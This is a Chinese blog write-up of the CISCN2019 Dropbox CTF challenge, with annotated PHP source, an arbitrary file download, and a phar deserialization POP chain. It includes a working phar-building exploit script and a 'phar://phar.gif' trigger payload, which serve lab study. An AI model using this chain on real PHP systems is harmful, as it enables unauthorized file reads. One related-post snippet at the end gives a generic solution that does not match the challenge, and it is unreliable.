[CISCN2019 华北赛区 Day1 Web1]Dropbox (phar反序列化)

最新推荐文章于 2023-06-05 14:32:49 发布
最新推荐文章于 2023-06-05 14:32:49 发布
阅读量2.4k 收藏 2
点赞数 1
分类专栏: web安全 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45699846/article/details/123422416
版权

[CISCN2019 华北赛区 Day1 Web1]Dropbox (phar反序列化)

经过测试,发现这里有个任意文件下载的漏洞,根据程序功能,下载到网站源码:


在这里插入图片描述
注意下本地环境:

代码审计:login.php

<?php
include "class.php";

if (isset($_GET['register'])) {
    echo "<script>toast('娉ㄥ唽鎴愬姛', 'info');</script>";
}

if (isset($_POST["username"]) && isset($_POST["password"])) {
    $u = new User();	# 初始化User对象
    $username = (string) $_POST["username"];
    $password = (string) $_POST["password"];
    if (strlen($username) < 20 && $u->verify_user($username, $password)) {	# username长度小于20,调用verify_user方法验证username和password
        $_SESSION['login'] = true;	# session设置login、username(这里还对username做了处理)、sandbox
        $_SESSION['username'] = htmlentities($username);
        $sandbox = "uploads/" . sha1($_SESSION['username'] . "sftUahRiTz") . "/";	# 上传路径:uploads/sha1(username+sftUahRiTz)/
        if (!is_dir($sandbox)) {
            mkdir($sandbox);
        }
        $_SESSION['sandbox'] = $sandbox;
        echo("<script>window.location.href='index.php';</script>");
        die();
    }
    echo "<script>toast('璐﹀彿鎴栧瘑鐮侀敊璇�', 'warning');</script>";
}
?>
  • 这里可能有sql注入,具体要看verify_user方法
  • 还注意到上传路径,其实是已知的

register.php

<?php
include "class.php";

if (isset($_POST["username"]) && isset($_POST["password"])) {
    $u = new User();
    $username = (string) $_POST["username"];
    $password = (string) $_POST["password"];
    if (strlen($username) < 20 && strlen($username) > 2 && strlen($password) > 1) {	# 限制username长度小于20,大于2,密码长度大于1
        if ($u->add_user($username, $password)) {	# 调用add_user方法
            echo("<script>window.location.href='login.php?register';</script>");
            die();
        } else {
            echo "<script>toast('姝ょ敤鎴峰悕宸茶浣跨敤', 'warning');</script>";
            die();
        }
    }
    echo "<script>toast('璇疯緭鍏ユ湁鏁堢敤鎴峰悕鍜屽瘑鐮�', 'warning');</script>";
}
?>

upload.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

include "class.php";

if (isset($_FILES["file"])) {
    $filename = $_FILES["file"]["name"]; 	# 文件名
    $pos = strrpos($filename, ".");		# 查找.最后出现的位置
    if ($pos !== false) {
        $filename = substr($filename, 0, $pos); # 截取最后出现.前的字符串
    }
    
    $fileext = ".gif";
    switch ($_FILES["file"]["type"]) {	#文件的 MIME 类型,需要浏览器提供该信息的支持,例如“image/gif”。
        case 'image/gif':
            $fileext = ".gif";
            break;
        case 'image/jpeg':
            $fileext = ".jpg";
            break;
        case 'image/png':
            $fileext = ".png";
            break;
        default:
            $response = array("success" => false, "error" => "Only gif/jpg/png allowed");
            Header("Content-type: application/json");
            echo json_encode($response);
            die();
    }

    if (strlen($filename) < 40 && strlen($filename) !== 0) {
        $dst = $_SESSION['sandbox'] . $filename . $fileext;	# 所上传文件的存储路径:uploads/sha1(username+sftUahRiTz)/文件名+fileexxt
        move_uploaded_file($_FILES["file"]["tmp_name"], $dst);	# 文件被上传后在服务端储存的临时文件名。
        $response = array("success" => true, "error" => "");
        Header("Content-type: application/json");
        echo json_encode($response);
    } else {
        $response = array("success" => false, "error" => "Invaild filename");
        Header("Content-type: application/json");
        echo json_encode($response);
    }
}
?>
  • 这里注意上传的文件,后缀会强制换成指定的三种

download.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");	# 就是只可以访问当前目录(getcwd()返回当前目录)、/etc和/tmp三个目录

chdir($_SESSION['sandbox']);	# 改变当前操作路径为上传文件的路径
$file = new File();	# 初始化file对象
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) { # 文件名不超过40、open方法、文件名中不能有flag
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>
  • download.php的操作路径被改成了uplaod/sha1()/,这也就是为啥文件下载的时候是 ../../index.php
  • 这里看出来确实可以任意文件下载

delete.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);	# 改变当前操作路径为上传文件的路径
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {	# 打开文件、调用delete方法删除文件
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>
  • 注意这里没有限制访问目录

class.php

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);	# 数据库连接

class User {
    public $db;

    public function __construct() {		# 构造函数
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;"); # 预处理,这里sql注入是不行的
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {	# 构造函数
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);	# filenames:path下的文件列表

        $key = array_search(".", $filenames);  # 寻找键值'.',返回键名
        unset($filenames[$key]);	# 删掉这个键值对
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file); # files存储一个用户上传路径下所有的文件对象
            $this->results[$file->name()] = array(); # result每个文件名都是一个键值,每个键值对应一个数组
        }
    }

    public function __call($func, $args) {	# 对象调用一个不存在的方法时调用
        array_push($this->funcs, $func);	# 把不存在的函数名存入funcs(args是不存在函数所带的参数)
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func(); # results[文件名][方法名]= 调用file类对应的方法 
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {	# 遍历funcs中的每个func
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {	# 遍历results中的每个键值对
            $table .= '<tr>';
            foreach ($result as $func => $value) { 	# 遍历result,得到func和对应的结果
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">涓嬭浇</a> / <a href="#" class="delete">鍒犻櫎</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {	# 文件存在且不是文件目录则返回true
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);	# 返回basename
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i]; 	# 返回文件大小
    }

    public function detele() {
        unlink($this->filename);	# 删除文件
    }

    public function close() {
        return file_get_contents($this->filename);	# 返回文件内容
    }
}
?>
  • 基本排除sql注入
  • 注意到两个魔术方法:__call__destruct是危险的
  • 最值得注意的是File类中的 close()方法,因为 file_get_contents往往会造成任意文件读取(而且这里出现这个非常突兀,整个网站都没出现文件内容呈现的功能),这里也是很危险的

index.php

<?php
include "class.php";

$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>

看到index这里才清楚class中的奇怪的函数:

  1. 初始化FileList类,调用Name、Size方法
  2. 看到 Filelist中是不存在这两种方法的,于是调用了 __call魔术方法
  3. __call方法:$this->results[$file->name()][$func] = $file->$func();results存储 File类对应方法的执行结果
  4. 最后当FileList对象销毁时,调用 __destruct魔术方法,打印出结果

这里有魔术方法,联系到了反序列化;结合phar反序列化问题,明确该题目确实有phar利用条件:

phar反序列化问题分析:利用 phar 拓展 php 反序列化漏洞攻击面

  1. 有文件上传条件,可以上传phar文件

  2. 可利用函数 题目中含有如 unlink、file_get_contents、isdir、file_exists等函数

  3. 文件操作函数的参数可控:upload.php中filename、delete.php中filename可控

  4. 题目对:/phar等特殊字符没有过滤。

POP利用链思路:

  1. 上传phar文件
    • 这里可以在upload上传文件,对于PHP,是以关键标识 __HALT_COMPILER();?> 识别phar文件的,所以文件后缀对文件识别没有影响
    • 改成 gif/jpg/png 后缀
  2. 后端触发反序列化
    • upload.php中filename、delete.php中filename可控
    • unlink、file_get_contents、isdir、file_exists这些函数在处理 phar文件时都会触发反序列化
    • 但是注意到 upload.php中限制了访问目录,如果想读到限制目录外的其他目录是不行的,所以由 delete.php来触发
  3. 执行魔术方法、读取指定文件
    • 如果想要读取文件内容,肯定要利用class.php中的File.close(),但是没有直接调用这个方法的语句;
    • 注意到 User类中在 __destruct时调用了close(),按原逻辑,$db应该是mysqli即数据库对象,但是我们可以构造$db指定为 File对象,这样就可以读取到文件了。
    • 可读取到文件不能呈现给我们,注意到 __call魔术方法,这个魔术方法的主要功能就是,如果要调用的方法我们这个类中不存在,就会去File中找这个方法,并把执行结果存入 $this->results[$file->name()][$func],刚好我们利用这一点:让 $dbFileList对象,当 $db销毁时,触发 __destruct,调用close(),由于 FileList没有这个方法,于是去 File类中找方法,读取到文件,存入 results
  4. 返回读取结果
    • __destruct正好会将 $this->results[$file->name()][$func]的内容打印出来

构造POP利用链:

<?php
    class User {
    	public $db;
    }
    class File {
    	public $filename;
    }
    class FileList {
        private $files;
        private $results;
        private $funcs;
        public function __construct() {
            $this->files = array();
            $this->results = array();
            $this->funcs = array();
            
            $file = new File();
            $file->filename = '/flag.txt';	# 这里的flag.txt是多次猜测出来的
            array_push($this->files, $file);
    	}
    }

    $user = new User();
	$filelist = new FileList();
	$user->db = $filelist;

    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");  //设置stub,增加gif文件头
    $phar->setMetadata($user); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

生成phar文件:

改一下后缀上传:

抓取delete.php的数据包,修改post提交的数据:

filename=phar://phar.gif

Red snow
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
看程序员是如何把自动化做到极致的!1
08-03
1. 自动化技术的概念:自动化技术是指使用计算机程序或机器人来执行重复性或批量性的任务,以提高生产效率和降低成本。在软件开发中,自动化技术广泛应用于测试、构建、部署和监控等方面。 2. 自动化测试:自动化...
NO.3-5 [CISCN2019 华北赛区 Day1 Web1]Dropbox
nigo134的博客
08-06 296
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。”."可代表当前目录,open_basedir也可以同时设置多个目录,在Win
[CISCN2019 华北赛区 Day1 Web1]Dropbox
snowlyzz的博客
09-05 997
phar + 代码审计
CISCN2019_华北赛区_Day1_Web1-Dropbox
抒情诗
10-23 359
好长时间没做web了,web狗太难了 首先得检讨一下,我竟然将近三天没做web题目了,这这这还是一个web狗应该做的吗?反思一下呜呜呜。。。 phar反序列化 什么是phar反序列化呢? 下面的文章可能会有点帮助来自jianshu 按照我的理解来说呢,就是把危险的文件上传到服务器?然后借助某些功能与危险函数实现危险的操作,太笼统了。具体来说呢就是php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data(在这里<meta-data>区域面搞反序列化的pop链)反序列化
密码卡:1Password兼容的命令行和基于Web的密码管理器
02-01
它将登录名和其他凭据保存在Dropbox的加密存储中,并使您能够通过Web应用程序或浏览器扩展程序从任何设备上受支持的浏览器(当前为Chrome,Firefox或Safari)访问它们。 浏览器扩展程序(当前可用于Chrome和Firefox...
node_dropbox:Assign1 - Nodejs Dropbox 项目
06-08
Assign1 - Nodejs Dropbox 项目 这是一个基本的 Dropbox 克隆,用于跨多个远程文件夹同步文件。 耗时:15小时 所需功能 客户端可以发出 GET 请求以获取文件或目录内容 - 完成客户端可以发出 HEAD 请求以仅获取 GET...
文件夹快速同步备份专家1.rar
03-19
10. 云存储集成:除了本地备份,可能还能连接到云存储服务(如Google Drive、Dropbox或OneDrive),实现云端同步和备份。 为了充分利用"文件夹快速同步备份专家1",用户需要理解自己的需求,选择合适的同步模式,...
ciscn2019华北赛区半决赛day1_web1题解
weixin_30776273的博客
08-07 440
感谢buuoj的大佬们搭建的复现环境。作为一位CTF的初学者,我会把每个题目的writeup都写的尽量详细,希望能帮到后面的初学者。 http://web42.buuoj.cn 文章会不定时继续完善,完善内容可能包括分析的错误、语病和文章结构等。 复现过程 进入解题页面发现需要登录,这里只需要注册一个账号然后登录即可。 登录以后是一个网盘的页面,最开始只有上传功能,并且只能上传pn...
buuctf-web-[CISCN2019 华北赛区 Day1 Web1]Dropbox
weixin_43345082的博客
08-27 3281
在下载的时候可以通过抓包修改文件名filename=…/…/index.php 获得源码 有这样几个页面 重点在class.php和delete.php中 当时提示是phar反序列化 什么是phar反序列化 传送门1 传送门2 在phar://xx.phar文件的时候 可以通过某些函数触发反序列化 delete.php会执行$file->detele(); class.php中的File类...
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
ZXW_NUDT的博客
06-05 1813
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
misc web 爆破3
weixin_43345082的博客
08-16 291
i春秋的一道小题 打开就能看见源码 import requests import re url = "http://dd3f4319242241c9acfc17a3302f16713c03d93cb09145ef.changame.ichunqiu.com/?value[]=ea" s=requests.session() r = s.get(url).text print (r[0:2]) f...
『CTF Web复现』BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
Ho1aAs‘s Blog
09-08 907
利用点:任意文件读取;phar反序列化POP链读取文件;绕过MIME文件上传;任意文件删除;phar://协议触发反序列化
[ciscn2019 华北赛区 day1 web1]dropbox
最新发布
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的用户名和密码,但是都无法登录成功。因此,我们需要通过其他方式来获取flag。 我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。在这个题目中,我们可以尝试一些文件上传漏洞。 我们可以通过Burp Suite等工具,来拦截网站的上传请求,然后修改上传的文件,来获取flag。 具体的操作步骤如下: 1. 使用Burp Suite等工具,拦截上传请求。 2. 修改上传的文件,将文件名改为flag.php。 3. 将上传的文件类型改为php。 4. 将上传的文件内容改为以下内容: <?php echo "flag{xxxxxxxxxxxxxxxxxxxx}"; ?> 其中,xxxxxxxxxxxxxxxxxxxx为flag的具体内容。 5. 发送修改后的上传请求,上传文件。 6. 访问上传的文件,即可获取flag。 通过以上步骤,我们就可以成功获取到flag了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值